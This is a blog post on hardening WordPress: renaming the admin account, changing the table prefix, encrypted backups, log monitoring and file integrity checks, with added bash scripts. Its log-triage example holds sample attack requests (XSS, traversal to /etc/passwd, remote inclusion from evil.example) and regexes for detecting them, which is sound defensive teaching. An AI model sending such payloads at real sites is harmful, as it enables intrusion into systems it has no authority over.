WordPress has come a long way since its launch in 2003 as a blogging platform: it is now the most widely used CMS among web professionals and powers the websites of many of the biggest names online. As discussed in the previous posts, the strength of WordPress lies in being open source, but that same openness and popularity make it a favourite target for attackers. You need to take a number of hardening steps to keep your WP installation from being compromised, and hence this post.
In our previous blog posts (Blog 1, Blog 2 and Blog 3) on WordPress security, we discussed web server and database security; vulnerabilities at the network and WordPress level; securing your site with a strong password and two-factor (two-step) authentication; why protected file transfer and restricted file permissions matter; safeguarding wp-admin, wp-includes and wp-config.php; disallowing file editing; keeping plugins updated; and a few other steps you should consider for hardening your WordPress installation.
In this blog post, we cover some more steps for securing your WordPress site: remaining inconspicuous, taking regular data backups, and logging and monitoring.
13. Security by discretion
Remaining inconspicuous may not sound like a very solid security strategy, and it is no substitute for the controls in the earlier posts, but obscuring a few well-known defaults in your WordPress installation removes the easy assumptions that automated attacks and canned exploits rely on.
Naming your administrative account:
When creating your administrative account, avoid simple usernames like webmaster or admin: they are guessed easily and are usually the first ones attacked. On an existing WordPress installation you can rename the administrative account with a MySQL front end like phpMyAdmin, or in the MySQL command-line client with a statement such as UPDATE wp_users SET user_login = 'newuser' WHERE user_login = 'admin'. Two caveats: WordPress also stores the name in user_nicename (used in author archive URLs such as /author/admin/ and exposed as the slug by the REST API users endpoint) and in display_name, so change those too or the old name stays visible; and the first user keeps ID 1, which /?author=1 will still redirect to, so renaming hides the login name but not the account's existence. Back up the database before running any such statement.
Changing the table_prefix:
A number of published SQL-injection exploits for WordPress assume the default table_prefix of wp_. Changing it does not fix the underlying injection flaw (an attacker with a working injection can read the real table names from information_schema), but it does break canned exploits that hard-code wp_ table names, which is why it is worth doing. For a new site, set $table_prefix in wp-config.php before running the installer. For an existing site you must rename every table, update the rows in wp_options and wp_usermeta whose keys embed the prefix (wp_user_roles, wp_capabilities, wp_user_level), and then change $table_prefix in wp-config.php; skip the options/usermeta step and every user is locked out.
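As an added example (not code from the original post), here is a small shell script that emits the SQL for both changes, the admin rename and the prefix change, so you can review it before piping it into the mysql client. It assumes MySQL/MariaDB, that the prefix you pass is the current one, GNU sed for the wp-config.php edit, and the standard core table names; plugin tables carrying the old prefix would need the same treatment, and the names `k9x_` and `siteowner` are just placeholders.

```bash
#!/usr/bin/env bash
# Added example, not from the original post. Emits the SQL for renaming the
# admin login and for changing the table prefix; review it, back up the
# database, then pipe it into mysql, e.g.
#   rename_admin_sql wp_ admin siteowner | mysql wordpress
#   change_prefix_sql wp_ k9x_           | mysql wordpress
# Assumes MySQL/MariaDB and GNU sed (for the wp-config.php edit).
set -eu

# Only [A-Za-z0-9_] is allowed, so nothing can break out of the SQL literals.
check_ident() {
  case "$1" in
    ''|*[!A-Za-z0-9_]*) echo "invalid identifier: '$1'" >&2; return 1 ;;
  esac
}

# Rename the administrative account. user_login is what the login form
# checks, but user_nicename (author URLs, REST API slug) and display_name
# still show the old name, so all three are updated.
rename_admin_sql() { # $1 = table prefix, $2 = current login, $3 = new login
  local prefix=$1 old=$2 new=$3
  check_ident "$prefix" && check_ident "$old" && check_ident "$new" || return 1
  cat <<EOF
UPDATE ${prefix}users
   SET user_login = '${new}', user_nicename = '${new}', display_name = '${new}'
 WHERE user_login = '${old}';
EOF
}

# Core tables that carry the prefix (termmeta exists since WordPress 4.4).
WP_CORE_TABLES="commentmeta comments links options postmeta posts termmeta
terms term_relationships term_taxonomy usermeta users"

# Change the prefix: rename every table, then fix the rows in options and
# usermeta whose keys embed the prefix (wp_user_roles, wp_capabilities,
# wp_user_level, ...). Skipping that second step locks every user out.
change_prefix_sql() { # $1 = current prefix, $2 = new prefix
  local old=$1 new=$2 t like_old
  check_ident "$old" && check_ident "$new" || return 1
  for t in $WP_CORE_TABLES; do
    echo "RENAME TABLE \`${old}${t}\` TO \`${new}${t}\`;"
  done
  # In LIKE, _ is a wildcard; escape it so 'wp_' does not also match 'wpx'.
  like_old=$(printf '%s' "$old" | sed 's/_/\\_/g')
  cat <<EOF
UPDATE ${new}options
   SET option_name = CONCAT('${new}', SUBSTRING(option_name, $((${#old} + 1))))
 WHERE option_name LIKE '${like_old}%';
UPDATE ${new}usermeta
   SET meta_key = CONCAT('${new}', SUBSTRING(meta_key, $((${#old} + 1))))
 WHERE meta_key LIKE '${like_old}%';
EOF
}

# Finally point wp-config.php at the new prefix (GNU sed -i assumed).
set_config_prefix() { # $1 = path to wp-config.php, $2 = new prefix
  check_ident "$2" || return 1
  sed -i "s/^\(\$table_prefix[[:space:]]*=[[:space:]]*\)'[^']*'/\1'$2'/" "$1"
}
```

Run the generated statements inside one session, and put the site into maintenance (or stop the web server) while you do it: between the RENAME and the wp-config.php edit every request will fail, and a half-applied change is worse than none.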
14. Regular Data Backup
One of the most important steps you can take to preserve the integrity of your data is a regular backup, including the MySQL database. To be confident that a backup has not been altered, encrypt it, keep a separate list of cryptographic hashes (SHA-256 rather than MD5) for every backed-up file, and/or write backups only to read-only or write-once media. The hash list must live somewhere the web server, and ideally the whole server, cannot write to: once an intruder has root on the host, a list kept beside the backups proves nothing, because they can rewrite both the files and the hashes.
A sound strategy is to keep a set of time-spaced snapshots of your complete WordPress installation, database and core files included, in a safe location off the server. Those snapshots let you rebuild the site after a compromise, and they let you compare a suspect installation against a known-good one to see exactly what changed and when.
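Here is an added example, not from the original post, of such a backup script for a Linux host: it dumps the database and the file tree, encrypts both, and seals the set with a SHA-256 manifest that a second host can verify before a restore. The paths, the key id and reading credentials from ~/.my.cnf are assumptions for the example; the mysqldump/tar/gpg steps need a real server, while the seal and verify functions work on any directory.

```bash
#!/usr/bin/env bash
# Added example, not from the original post. Assumptions: the site lives in
# WP_ROOT; mysqldump reads its credentials from ~/.my.cnf (never put the
# password on the command line, it shows up in `ps`); GPG_RECIPIENT is a
# public key whose private half is kept off this server; BACKUP_DIR is a
# location the web server account cannot write to, copied on to offline or
# write-once media afterwards. Run from root's crontab.
set -eu

WP_ROOT=${WP_ROOT:-/var/www/html}
BACKUP_DIR=${BACKUP_DIR:-/backup/wordpress}
GPG_RECIPIENT=${GPG_RECIPIENT:-backups@example.com}   # assumed key id

# Dump the database and encrypt it in one pipeline so the plaintext never
# touches disk. DB_NAME is read from wp-config.php.
dump_db() { # $1 = destination dir
  local db
  db=$(sed -n "s/^define( *'DB_NAME', *'\([^']*\)'.*/\1/p" "$WP_ROOT/wp-config.php")
  mysqldump --single-transaction --routines "$db" | gzip -9 \
    | gpg --batch --yes --encrypt --recipient "$GPG_RECIPIENT" \
          --output "$1/db.sql.gz.gpg"
}

# Archive the whole tree: core, plugins, themes, uploads and wp-config.php.
archive_files() { # $1 = destination dir
  tar -C "$(dirname "$WP_ROOT")" -czf - "$(basename "$WP_ROOT")" \
    | gpg --batch --yes --encrypt --recipient "$GPG_RECIPIENT" \
          --output "$1/files.tar.gz.gpg"
}

# Write a SHA-256 line for every file in a backup set (SHA-256 rather than
# the MD5 mentioned above). Store the manifest somewhere else, or sign it:
# on the same disk an intruder with root can rewrite both files and hashes.
seal_backup() { # $1 = backup set dir, $2 = manifest path (absolute)
  ( cd "$1" && find . -type f -exec sha256sum {} + ) | LC_ALL=C sort -k2 >"$2"
}

# Check a backup set against its manifest: 0 if every file is intact,
# non-zero if anything is missing or altered. Do this on a host other than
# the web server before trusting a set for a restore.
verify_backup() { # $1 = backup set dir, $2 = manifest path (absolute)
  ( cd "$1" && sha256sum -c "$2" ) >/dev/null 2>&1
}

# One timestamped run: database, files, then the manifest beside the set
# (move or copy the manifest off-host as part of the same job).
backup_wordpress() {
  local set_dir
  set_dir="$BACKUP_DIR/$(date +%Y%m%d-%H%M%S)"
  mkdir -p "$set_dir"
  dump_db "$set_dir"
  archive_files "$set_dir"
  seal_backup "$set_dir" "$set_dir.sha256"
  echo "$set_dir"
}

# Cron entry point, e.g.  0 3 * * * root /usr/local/sbin/wp-backup.sh run
if [ "${1:-}" = run ]; then backup_wordpress; fi
```

Test a restore from these archives at least once, on a scratch host, before you need one: an encrypted backup whose key nobody can find is the same as no backup.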
15. Logging & Monitoring
Forensic logs let you track activity on your website. They may not tell you directly which user was logged in, but they do give you the IP address and the time at which a change was made. You can also spot brute-force attempts and attacks such as directory traversal, cross-site scripting (XSS), local file inclusion (LFI) and remote file inclusion (RFI) in the web server's access and error logs. Note that WordPress core does not log logins or admin actions by itself, so the web server's access log is your main record; and if the site sits behind a reverse proxy or CDN, make sure the real client address is logged rather than the proxy's, or every attacker will appear to come from the same IP.
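To make the access-log review concrete, here is an added example (not from the original post) that runs a few simple pattern checks over a constructed combined-format log. The log lines, IP addresses and the threshold are made up for the example; the patterns are deliberately coarse and will throw some false positives, so treat hits as leads to investigate rather than verdicts.

```bash
#!/usr/bin/env bash
# Added example, not from the original post: first-pass triage of an Apache
# or Nginx combined-format access log for the attack classes named above.
set -eu

# Constructed sample log for the example (not real traffic).
SAMPLE_LOG=$(mktemp)
trap 'rm -f "$SAMPLE_LOG"' EXIT
cat >"$SAMPLE_LOG" <<'EOF'
203.0.113.7 - - [10/Jun/2014:10:01:02 +0000] "GET /?s=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jun/2014:10:01:05 +0000] "GET /wp-content/plugins/gallery/dl.php?f=../../../../etc/passwd HTTP/1.1" 404 210 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Jun/2014:10:02:11 +0000] "GET /index.php?page=http://evil.example/shell.txt HTTP/1.1" 200 1200 "-" "curl/7.35"
198.51.100.9 - - [10/Jun/2014:10:02:12 +0000] "GET /index.php?page=php://input HTTP/1.1" 200 300 "-" "curl/7.35"
192.0.2.44 - - [10/Jun/2014:10:03:00 +0000] "POST /wp-login.php HTTP/1.1" 200 3200 "-" "Mozilla/5.0"
192.0.2.44 - - [10/Jun/2014:10:03:01 +0000] "POST /wp-login.php HTTP/1.1" 200 3200 "-" "Mozilla/5.0"
192.0.2.44 - - [10/Jun/2014:10:03:02 +0000] "POST /wp-login.php HTTP/1.1" 200 3200 "-" "Mozilla/5.0"
192.0.2.44 - - [10/Jun/2014:10:03:03 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.50 - - [10/Jun/2014:10:04:00 +0000] "GET /2014/06/hello-world/ HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
EOF

# Count lines matching an extended regex, case-insensitively. grep -c exits 1
# when the count is zero, so "|| true" stops set -e treating no hits as an error.
count_matches() { # $1 = log file, $2 = regex
  grep -Eic "$2" "$1" || true
}
# Encoded and decoded forms are both matched; one request can hit several
# classes (a traversal payload that reaches /etc/passwd is also an LFI).
traversal_hits() { count_matches "$1" '(\.\./|\.\.%2f|%2e%2e(/|%2f))'; }
xss_hits()       { count_matches "$1" '(<script|%3cscript|javascript:|onerror=)'; }
lfi_hits()       { count_matches "$1" '(/etc/passwd|/proc/self/environ|php://)'; }
rfi_hits()       { count_matches "$1" '=(https?|ftp)(://|%3a%2f%2f)'; }

# Password guessing: more than $2 POSTs to wp-login.php from one address.
# Prints "<count> <ip>" per offender. A failed WordPress login re-renders
# the form (200); a 302 after a run of 200s from the same IP usually means
# one of the guesses worked, so check that account next.
login_bruteforce() { # $1 = log file, $2 = threshold
  awk -v n="$2" '$6 == "\"POST" && $7 ~ /^\/wp-login\.php/ { c[$1]++ }
    END { for (ip in c) if (c[ip] > n) print c[ip], ip }' "$1"
}

# Summary for one log file. With many sites on one server, loop over every
# vhost's access_log; behind a proxy or CDN, make sure the log records the
# real client address (X-Forwarded-For), not the proxy's.
triage_log() { # $1 = log file
  echo "traversal: $(traversal_hits "$1")  xss: $(xss_hits "$1")  lfi: $(lfi_hits "$1")  rfi: $(rfi_hits "$1")"
  login_bruteforce "$1" 3 | sed 's/^/login brute force: /'
}

triage_log "$SAMPLE_LOG"
```

Once the patterns are tuned for your site, the same checks are what you would express as rules in a log monitor such as OSSEC so they run continuously instead of after the fact.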
You can add a further layer by deploying an open-source solution such as OSSEC on your web server. Its agents run on Windows and on any *NIX distribution, and it combines log monitoring, host-based intrusion detection (HIDS) and SIM/SIEM functions in one platform for monitoring and controlling your systems. If many websites share the server account, make sure it is configured to read the full error_log and access_log of every one of them, not just the default site.
Prevention alone does not always suffice and a break-in may still happen, so continuous monitoring or intrusion detection is essential. It lets you notice an incident early, while the logs and file-system traces are still intact, and recover your site's data.
On a dedicated or virtual private server you have root access, so you can install these tools yourself and keep an eye on what is happening; OSSEC's log monitoring is available there as well.
An attack almost always leaves traces on the file system or in the logs. OSSEC can also monitor files and alert you when they change. System administrators can track the file system with general-purpose tools as well: revision control, system utilities and kernel/OS-level monitoring. Several tools serve this purpose, including OSSEC; Git, which can hold the site's source under version control so that unexpected changes show up in git status and git diff; and diff, which can compare a clean reference copy of the site against the live files.
When configuring file-system-based monitoring, keep the following points in mind:
- Running the monitoring service/script as root:
This makes it harder for an attacker who has compromised the web server account to change or disable your file-system tracking, and it keeps the baseline readable only by root.
- Disabling monitoring during upgrades/scheduled maintenance:
This prevents a flood of expected notices during routine site maintenance. Re-enable it and record a fresh baseline as soon as the maintenance is done, after checking that the upgrade itself was clean; otherwise the window becomes a blind spot.
- Monitoring executable file types only:
Tracking only executable files, such as .php files, keeps unnecessary alerts and log entries down. Include .htaccess as well, since it can make other extensions execute as PHP, and treat a .php file appearing under wp-content/uploads as a finding in itself, because nothing legitimate should put one there.
- Using stringent file-system permissions:
As discussed in detail in our second post on WordPress security, read and write permissions should be as restrictive as possible; the fewer files the web server account can write, the fewer the monitor has to worry about.
- External monitoring of the web server:
Scan your website regularly from outside with a malware detection tool. Such tools look at the pages actually served to visitors, so they catch injected malware and notify you in time to act, including changes a host-side monitor can miss.
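The points in this list, implemented as a root cron job, make up the following added example (not from the original post): it baselines only PHP files and .htaccess, skips its run while a maintenance flag exists, and reports added, changed and removed files. The paths and the flag file are assumptions; the baseline lives outside the web root so the web server account cannot edit it.

```bash
#!/usr/bin/env bash
# Added example, not from the original post. Paths and the flag file are
# assumptions; run this from root's crontab so the web server account can
# neither edit the baseline nor stop the check.
set -eu

WP_ROOT=${WP_ROOT:-/var/www/html}
BASELINE=${BASELINE:-/var/lib/fim/wp-baseline.sha256}   # outside the web root
MAINT_FLAG=${MAINT_FLAG:-/var/lib/fim/maintenance}      # touch it during upgrades

# Hash the files that matter: PHP plus .htaccess (which can turn any other
# extension into PHP). Uploads should contain no PHP at all, so a hit there
# is a finding by itself. Sorted by path so two snapshots diff cleanly.
fim_snapshot() { # $1 = tree to scan
  ( cd "$1" && find . -type f \( -name '*.php' -o -name '.htaccess' \) \
      -exec sha256sum {} + ) | LC_ALL=C sort -k2
}

# Record the known-good state. Re-run this right after every upgrade, once
# you have confirmed the upgrade itself was clean.
fim_baseline() { # $1 = tree to scan
  mkdir -p "$(dirname "$BASELINE")"
  fim_snapshot "$1" >"$BASELINE"
}

# Diff a baseline against a snapshot; prints one line per difference:
# ADDED <path>, CHANGED <path> or REMOVED <path>. Nothing printed = no drift.
fim_compare() { # $1 = baseline file, $2 = snapshot file
  awk '
    FILENAME == ARGV[1] { base[$2] = $1; next }   # fields: hash  path
    { cur[$2] = $1 }
    END {
      for (p in cur)  if (!(p in base)) print "ADDED " p
      for (p in cur)  if ((p in base) && base[p] != cur[p]) print "CHANGED " p
      for (p in base) if (!(p in cur)) print "REMOVED " p
    }' "$1" "$2" | LC_ALL=C sort
}

# Cron entry point. Returns 0 when the tree matches the baseline (or during
# maintenance), 2 when it has drifted; the report goes to stdout, which cron
# mails to root. Returns 1 if no baseline exists yet.
fim_check() { # $1 = tree to scan
  if [ -e "$MAINT_FLAG" ]; then
    echo "maintenance flag $MAINT_FLAG present, skipping" >&2
    return 0
  fi
  [ -r "$BASELINE" ] || { echo "no baseline at $BASELINE; run fim_baseline" >&2; return 1; }
  local snap report
  snap=$(mktemp)
  fim_snapshot "$1" >"$snap"
  report=$(fim_compare "$BASELINE" "$snap")
  rm -f "$snap"
  if [ -n "$report" ]; then
    printf '%s\n' "$report"
    return 2
  fi
}

# Usage: "wp-fim.sh baseline" once, then e.g. "*/15 * * * * root wp-fim.sh check".
case "${1:-}" in
  baseline) fim_baseline "$WP_ROOT" ;;
  check)    fim_check "$WP_ROOT" ;;
esac
```

A CHANGED line on a core file outside an upgrade window, or an ADDED .php anywhere under wp-content/uploads, is the kind of alert that should page someone; compare the file against your last clean backup before deciding whether to restore.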
NOTE: This blog is fourth and last part of a four blog series on WordPress hardening. Part 1, Part 2 and Part 3 are already live. If you have any query regarding this series or this post in particular, please let me know using the comments section below. I will be happy to respond. 🙂